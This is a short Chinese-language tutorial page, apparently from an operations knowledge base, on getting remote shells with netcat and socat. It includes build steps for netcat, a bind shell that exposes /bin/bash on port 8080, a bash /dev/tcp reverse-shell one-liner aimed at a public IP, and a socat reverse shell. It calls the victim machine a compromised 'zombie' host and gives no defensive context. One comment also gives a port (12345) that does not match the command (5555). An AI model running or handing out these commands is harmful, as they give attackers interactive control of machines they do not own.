nc反弹

安装原生版本的nc

wget https://nchc.dl.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz 
tar xf netcat-0.7.1.tar.gz 
cd netcat-0.7.1
# 执行编译需要gcc环境
./configure --prefix=/usr/local/ncat
make -j 2 && make install
ln -s /usr/local/ncat/bin/nc /usr/bin/nc

场景一:被攻击机和攻击机在同一个网络中时

  • 被攻击机开启监听,并将bash发布出去

nc -lvvp 8080 -t -e /bin/bash

  • 攻击机上直接连接目标主机的8080端口

nc 192.168.31.41 8080

场景二:被攻击机和攻击机在不同网络中时,比如被攻击机身处内网没有公网IP

  • 攻击机上开启8080监听, 等待shell反弹

nc -lvvp 8080

  • 被攻击机上使用一句话反弹shell

bash -i >& /dev/tcp/211.149.240.203/8080 0>&1

  • 此时攻击机上已经接受到了shell,攻击机上执行ip add命令验证ip

socat 反弹shell

socket cat,基于socket,可以看做是ncat的加强版

socat命令下载链接,下载后直接放置/usr/local/bin目录即可使用

https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat

肉鸡没有公网IP的情况 反弹shell

  • 1、攻击机上开启监听

socat TCP-LISTEN:5555 -

  • 2、被攻击机机上运行socat反弹shell(表示将shell反弹到192.168.1.101的12345端口)

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.101:5555

  • 3、攻击机上已经获取到shell,可以直接iP add等命令查看
Copyright © 运维知识库 all right reserved,powered by Gitbook文件修订时间: 2023-09-19 10:45:38

results matching ""

    No results matching ""